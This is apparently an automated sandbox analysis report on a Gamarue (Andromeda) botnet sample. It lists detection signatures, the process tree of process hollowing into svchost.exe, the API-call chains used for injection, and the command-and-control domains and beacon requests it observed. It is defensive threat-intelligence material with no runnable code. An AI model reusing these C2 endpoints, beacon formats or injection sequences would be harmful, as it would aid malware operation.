Edit tour

Windows Analysis Report
Hu25VEa8Dr.exe

Overview

General Information

Sample Name:	Hu25VEa8Dr.exe (renamed file extension from none to exe, renamed because original name is a hash value)
Original Sample Name:	9535a9bb1ae8f620d7cbd7d9f5c20336b0fd2c78d1a7d892d76e4652dd8b2be7
Analysis ID:	1317431
MD5:	bc76bd7b332aa8f6aedbb8e11b7ba9b6
SHA1:	c6858031315a50ec87e37966291ec69b64600efb
SHA256:	9535a9bb1ae8f620d7cbd7d9f5c20336b0fd2c78d1a7d892d76e4652dd8b2be7
Infos:

Detection

Gamarue

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Detected unpacking (overwrites its own PE header)

Antivirus / Scanner detection for submitted sample

System process connects to network (likely due to code injection or exploit)

Tries to download HTTP data from a sinkholed server

Detected unpacking (changes PE section rights)

Antivirus detection for URL or domain

Yara detected Gamarue

Multi AV Scanner detection for domain / URL

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Snort IDS alert for network traffic

Sample uses process hollowing technique

Maps a DLL or memory area into another process

Writes to foreign memory regions

Contain functionality to detect virtual machines

Allocates memory in foreign processes

Injects a PE file into a foreign processes

Contains functionality to inject code into remote processes

Tries to detect virtualization through RDTSC time measurements

Creates an undocumented autostart registry key

Machine Learning detection for dropped file

Contains functionality to check if Internet connection is working

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Drops PE files to the application program directory (C:\ProgramData)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Stores large binary data to the registry

Contains functionality to get notified if a device is plugged in / out

Found evasive API chain (may stop execution after checking a module file name)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains functionality for execution timing, often used to detect debuggers

Drops files with a non-matching file extension (content does not match file extension)

AV process strings found (often used to terminate AV products)

Sample file is different than original file name gathered from version info

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Found evasive API chain checking for process token information

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Uses Microsoft's Enhanced Cryptographic Provider

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w7x64

Hu25VEa8Dr.exe (PID: 2948 cmdline: C:\Users\user\Desktop\Hu25VEa8Dr.exe MD5: BC76BD7B332AA8F6AEDBB8E11B7BA9B6)

Sahofivizu.exe (PID: 920 cmdline: C:\Users\user\AppData\Local\Temp\Sahofivizu.exe" "C:\Users\user\Desktop\Hu25VEa8Dr.exe MD5: 7FE00CC4EA8429629AC0AC610DB51993)

Hu25VEa8Dr.exe (PID: 1724 cmdline: C:\Users\user\Desktop\Hu25VEa8Dr.exe MD5: BC76BD7B332AA8F6AEDBB8E11B7BA9B6)

Hu25VEa8Dr.exe (PID: 2092 cmdline: C:\Users\user\Desktop\Hu25VEa8Dr.exe MD5: BC76BD7B332AA8F6AEDBB8E11B7BA9B6)

msiexec.exe (PID: 1948 cmdline: "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" MD5: B3657BCFE8240BC0985093A0F8682703)

Lohonibuhod.exe (PID: 1396 cmdline: "C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe" "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" MD5: 44902781C1865978B17F396DB51D85E1)

msiexec.exe (PID: 2748 cmdline: "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" MD5: B3657BCFE8240BC0985093A0F8682703)

msiexec.exe (PID: 2948 cmdline: "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe" MD5: B3657BCFE8240BC0985093A0F8682703)

svchost.exe (PID: 1740 cmdline: C:\Windows\syswow64\svchost.exe MD5: 54A47F6B5E09A77E61649109C6A08866)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Andromeda, Gamarue, B106-Gamarue, B67-SS-Gamarue		Operation C-Major	http://blog.morphisec.com/andromeda-tactics-analyzed http://resources.infosecinstitute.com/andromeda-bot-analysis-part-two/ http://resources.infosecinstitute.com/andromeda-bot-analysis/ http://www.0xebfe.net/blog/2013/03/30/fooled-by-andromeda/ https://blog.avast.com/andromeda-under-the-microscope	https://malpedia.caad.fkie.fraunhofer.de/details/win.andromeda

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: svchost.exe PID: 1740	JoeSecurity_Gamarue	Yara detected Gamarue	Joe Security

Snort Signatures

ET TROJAN Known Sinkhole Response Kryptos Logic - Source IP: 147.75.61.38 - Destination IP: 192.168.2.22

Timestamp:	147.75.61.38192.168.2.2280491662031515 10/01/23-06:01:37.455932
SID:	2031515
Source Port:	80
Destination Port:	49166
Protocol:	TCP
Classtype:	Misc activity

Code function: 9_2_001E29C0 _memset,UnregisterDeviceNotification,CloseHandle,UnregisterDeviceNotification,CloseHandle,wsprintfW,wsprintfW,GetDriveTypeW,GetDriveTypeW,GetDriveTypeW,wsprintfW,CreateFileW,RegisterDeviceNotificationW,Sleep,DefWindowProcW,UnregisterDeviceNotification,CloseHandle,PostQuitMessage,

9_2_001E29C0

Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Code function: 0_2_00405D07 FindFirstFileA,FindClose,	0_2_00405D07
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Code function: 0_2_00405331 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	0_2_00405331
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Code function: 0_2_0040263E FindFirstFileA,	0_2_0040263E
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Code function: 5_2_00405D07 FindFirstFileA,FindClose,	5_2_00405D07
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Code function: 5_2_00405331 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	5_2_00405331
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Code function: 5_2_0040263E FindFirstFileA,	5_2_0040263E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_001E1E80 GetFileAttributesW,wsprintfW,wsprintfW,wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,MoveFileExW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,	9_2_001E1E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_001E1700 GetDriveTypeW,wsprintfW,wsprintfW,FindFirstFileW,DeleteFileW,wsprintfW,wsprintfW,wsprintfW,DeleteFileW,SetFileAttributesW,DeleteFileW,wsprintfW,DeleteFileW,SetFileAttributesW,DeleteFileW,lstrcmpiW,lstrcmpiW,wsprintfW,DeleteFileW,SetFileAttributesW,DeleteFileW,lstrcmpiW,lstrcmpiW,wsprintfW,DeleteFileW,SetFileAttributesW,DeleteFileW,wsprintfW,SetFileAttributesW,FindNextFileW,FindClose,	9_2_001E1700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_001E1B70 wsprintfW,FindFirstFileW,RemoveDirectoryW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,FindClose,FindClose,	9_2_001E1B70

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 9_2_001E10D0 RegisterClassW,LdrInitializeThunk,_memset,GetLogicalDriveStringsW,GetDriveTypeW,GetDriveTypeW,SetErrorMode,CreateWindowExW,GetMessageW,GetMessageW,TranslateMessage,DispatchMessageW,TranslateMessage,DispatchMessageW,GetMessageW,

9_2_001E10D0

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 147.75.61.38 80	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: pe.suckmycocklameavindustry.in
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: xdqzpbcgrvkj.ru
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: anam0rph.su
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 34.29.71.138 80	Jump to behavior

Tries to download HTTP data from a sinkholed server

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 01 Oct 2023 04:01:37 GMTContent-Length: 607Content-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 53 69 6e 6b 68 6f 6c 65 64 20 62 79 20 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 20 53 69 6e 6b 68 6f 6c 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 73 69 6e 6b 68 6f 6c 65 2e 63 6f 6d 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 66 6c 61 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 62 6f 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 69 67 2d 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 68 31 3e 53 69 6e 6b 68 6f 6c 65 64 21 3c 2f 68 31 3e 3c 70 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 62 65 65 6e 20 73 69 6e 6b 68 6f 6c 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 2e 63 6f 6d 22 3e 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 61 3e 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en-us" class="no-js"><head><meta charset="utf-8"><title>Sinkholed by Kryptos Logic</title><meta name="description" content="Kryptos Logic Sinkhole"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href="//static.kryptoslogicsinkhole.com/style.css" rel="stylesheet" type="text/css"/></head><body class="flat"><div class="content"><div class="content-box"><div class="big-content"><div class="clear"></div></div><h1>Sinkholed!</h1><p>This domain has been sinkholed by <a href="https://www.kryptoslogic.com">Kryptos Logic</a>.</p></div></div></body></html>

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2031515 ET TROJAN Known Sinkhole Response Kryptos Logic 147.75.61.38:80 -> 192.168.2.22:49166

Contains functionality to check if Internet connection is working

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 9_2_00021474 socket,connect,getsockname,shutdown,closesocket, www.update.microsoft.com

9_2_00021474

Source: global traffic	HTTP traffic detected: POST /in.php HTTP/1.1Host: xdqzpbcgrvkj.ruUser-Agent: Mozilla/4.0Content-Type: application/x-www-form-urlencodedContent-Length: 84Connection: close
Source: global traffic	HTTP traffic detected: GET /dtkdvjezlgdvslgbvqqjiiheaxroigff HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: pe.suckmycocklameavindustry.inConnection: Keep-Alive

Source: svchost.exe, svchost.exe, 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://anam0rph.su/in.php
Source: svchost.exe, svchost.exe, 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://bdcrqgonzmwuehky.nl/in.php
Source: svchost.exe	String found in binary or memory: http://img.suckmycocklameavindustry.in/
Source: Hu25VEa8Dr.exe, 00000003.00000002.350134891.0000000002120000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://nsis.sf.net/
Source: msiexec.exe, msiexec.exe, 00000005.00000002.353292307.0000000000409000.00000004.00000001.01000000.0000000A.sdmp, msiexec.exe, 00000005.00000000.351213851.0000000000409000.00000008.00000001.01000000.0000000A.sdmp, msiexec.exe, 00000007.00000000.364458175.0000000000409000.00000008.00000001.01000000.0000000A.sdmp, msiexec.exe, 00000008.00000000.365114158.0000000000409000.00000008.00000001.01000000.0000000A.sdmp, Hu25VEa8Dr.exe, 0BBFF.tmp.4.dr, msoiruj.bat.9.dr, msiexec.exe.4.dr	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: Hu25VEa8Dr.exe, 0BBFF.tmp.4.dr, msoiruj.bat.9.dr, msiexec.exe.4.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: svchost.exe, svchost.exe, 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://orzdwjtvmein.in/in.php
Source: svchost.exe	String found in binary or memory: http://pe.suckmycocklameavindustry.in/
Source: svchost.exe, 00000009.00000003.373478974.0000000000130000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.381475492.00000000001E0000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://pe.suckmycocklameavindustry.in/DOS_STUBhttp://sc.suckmycocklameavindustry.in/ImageBasehttp://
Source: svchost.exe, 00000009.00000002.381503603.0000000000484000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pe.suckmycocklameavindustry.in/dtkdvjezlgdvslgbvqqjiiheaxroigff
Source: svchost.exe, 00000009.00000002.381503603.0000000000484000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pe.suckmycocklameavindustry.in/dtkdvjezlgdvslgbvqqjiiheaxroigff6Tl
Source: svchost.exe, 00000009.00000002.381503603.00000000004D4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.381500240.000000000044A000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://pe.suckmycocklameavindustry.in/dtkdvjezlgdvslgbvqqjiiheaxroigffC:
Source: svchost.exe	String found in binary or memory: http://sc.suckmycocklameavindustry.in/
Source: svchost.exe, svchost.exe, 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://somicrososoft.ru/in.php
Source: svchost.exe, svchost.exe, 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xdqzpbcgrvkj.ru/in.php
Source: svchost.exe, 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xdqzpbcgrvkj.ru/in.phphttp://anam0rph.su/in.phphttp://orzdwjtvmein.in/in.phphttp://ygiudewsqh
Source: svchost.exe, svchost.exe, 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ygiudewsqhct.in/in.php

Source: unknown

HTTP traffic detected: POST /in.php HTTP/1.1Host: xdqzpbcgrvkj.ruUser-Agent: Mozilla/4.0Content-Type: application/x-www-form-urlencodedContent-Length: 84Connection: close

Source: C:\Windows\SysWOW64\svchost.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\dtkdvjezlgdvslgbvqqjiiheaxroigff[1].htm

Jump to behavior

Source: unknown

DNS traffic detected: queries for: xdqzpbcgrvkj.ru

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 9_2_001E1430 _memset,_memset,_memset,GetTempPathW,GetTempFileNameW,RegOpenKeyExW,RegQueryValueExW,RegSetValueExW,RegCloseKey,URLDownloadToFileW,DeleteFileW,DeleteFileW,SetFileAttributesW,DeleteFileW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,RegOpenKeyExW,RegSetValueExW,RegCloseKey,VirtualFree,CloseHandle,DeleteFileW,DeleteFileW,SetFileAttributesW,DeleteFileW,

9_2_001E1430

Source: global traffic

HTTP traffic detected: GET /dtkdvjezlgdvslgbvqqjiiheaxroigff HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: pe.suckmycocklameavindustry.inConnection: Keep-Alive

Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe

Code function: 0_2_00404EE8 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00404EE8

Source: Hu25VEa8Dr.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Code function: 0_2_004030FA EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,		0_2_004030FA
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Code function: 5_2_004030FA EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,		5_2_004030FA

Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Code function: 0_2_00406128	0_2_00406128
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Code function: 0_2_004046F9	0_2_004046F9
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Code function: 0_2_004068FF	0_2_004068FF
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Code function: 4_2_0040F80F	4_2_0040F80F
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Code function: 4_2_0040F038	4_2_0040F038
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Code function: 4_2_0040D609	4_2_0040D609
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Code function: 5_2_00406128	5_2_00406128
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Code function: 5_2_004046F9	5_2_004046F9
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Code function: 5_2_004068FF	5_2_004068FF
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Code function: 8_2_004017AF	8_2_004017AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_001E21A0	9_2_001E21A0

Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exe	Code function: 2_2_10001000 bedevahetay,LoadLibraryA,GetCommandLineA,PathGetArgsA,RtlZeroMemory,LoadLibraryA,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,SetThreadContext,	2_2_10001000
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Code function: 3_2_00402298 PathCombineA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,	3_2_00402298
Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe	Code function: 6_2_10001000 zejutuhodomo,GetModuleHandleA,GetCommandLineA,PathGetArgsA,RtlZeroMemory,LoadLibraryA,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,SetThreadContext,	6_2_10001000
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Code function: 7_2_00402298 PathCombineA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,	7_2_00402298
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Code function: 8_2_00401284 NtAllocateVirtualMemory,	8_2_00401284
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Code function: 8_2_001E00C0 GetModuleHandleW,VirtualAlloc,GetModuleFileNameW,SetEnvironmentVariableW,GetWindowsDirectoryW,NtQueryInformationProcess,lstrcatW,lstrcatW,CreateFileW,NtCreateSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,CreateProcessW,NtDelayExecution,NtUnmapViewOfSection,NtMapViewOfSection,NtClose,GetThreadContext,NtUnmapViewOfSection,NtUnmapViewOfSection,NtMapViewOfSection,NtResumeThread,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtClose,CloseHandle,VirtualFree,ExitProcess,	8_2_001E00C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_00081284 NtAllocateVirtualMemory,	9_2_00081284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_00020973 GetProcessHeap,GetVersionExA,NtQueryInformationProcess,NtDelayExecution,VirtualAlloc,GetEnvironmentVariableW,SetEnvironmentVariableW,GetShortPathNameW,wsprintfA,CreateMutexA,GetLastError,SetFileAttributesW,DeleteFileW,VirtualFree,WSAStartup,CreateThread,CloseHandle,CreateThread,CloseHandle,CreateThread,WaitForSingleObject,CloseHandle,NtDelayExecution,SetFileAttributesW,DeleteFileW,VirtualFree,ExitProcess,SetErrorMode,	9_2_00020973
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_00022B45 NtDelayExecution,VirtualAlloc,ExpandEnvironmentStringsW,GetTickCount,wsprintfW,CreateFileW,WriteFile,CloseHandle,CreateProcessW,CloseHandle,CloseHandle,VirtualFree,HeapFree,	9_2_00022B45
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_00022E82 NtDelayExecution,	9_2_00022E82
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_00022CBA NtDelayExecution,HeapFree,RtlAllocateHeap,wsprintfA,RtlAllocateHeap,lstrlen,HeapFree,HeapFree,ExitProcess,	9_2_00022CBA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_000228B8 NtDelayExecution,VirtualAlloc,GetModuleFileNameW,CreateFileW,GetFileTime,CloseHandle,lstrcpy,RegOpenKeyExA,wsprintfW,RegQueryValueExW,RegCloseKey,ExpandEnvironmentStringsW,GetTickCount,wsprintfW,CloseHandle,CreateFileW,WriteFile,SetFileTime,CloseHandle,CreateProcessW,CloseHandle,ResumeThread,CloseHandle,CloseHandle,VirtualFree,HeapFree,	9_2_000228B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_000223DC NtDelayExecution,GetTickCount,wsprintfW,VirtualAlloc,ExpandEnvironmentStringsW,SetCurrentDirectoryW,lstrcatW,CreateFileW,WriteFile,CloseHandle,LoadLibraryW,GetProcAddress,FreeLibrary,wsprintfA,lstrcpy,RegOpenKeyExA,lstrlen,RegSetValueExA,RegCloseKey,GetSystemDirectoryW,SetCurrentDirectoryW,VirtualFree,HeapFree,	9_2_000223DC

Source: Hu25VEa8Dr.exe, 00000004.00000003.350394202.00000000005ED000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSHDOCVW.DLL.MUIj% vs Hu25VEa8Dr.exe
Source: Hu25VEa8Dr.exe, 00000004.00000003.350389547.00000000005E6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSHDOCVW.DLL.MUIj% vs Hu25VEa8Dr.exe
Source: Hu25VEa8Dr.exe, 00000004.00000003.350397688.00000000005F1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSHDOCVW.DLL.MUIj% vs Hu25VEa8Dr.exe
Source: Hu25VEa8Dr.exe, 00000004.00000003.350301075.00000000005DA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewpdshext.dll.muij% vs Hu25VEa8Dr.exe

Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exe	Section loaded: gozekeneka.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exe	Section loaded: zojemilocan.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exe	Section loaded: xuxokuxoka.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe	Section loaded: jahulocayedo.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe	Section loaded: firozedikami.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe	Section loaded: yiduyevutog.dll	Jump to behavior

Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Memory allocated: 771D0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exe	Memory allocated: 771D0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Memory allocated: 771D0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Memory allocated: 771D0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Memory allocated: 771D0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe	Memory allocated: 771D0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Memory allocated: 771D0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Memory allocated: 771D0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory allocated: 771D0000 page execute and read and write	Jump to behavior

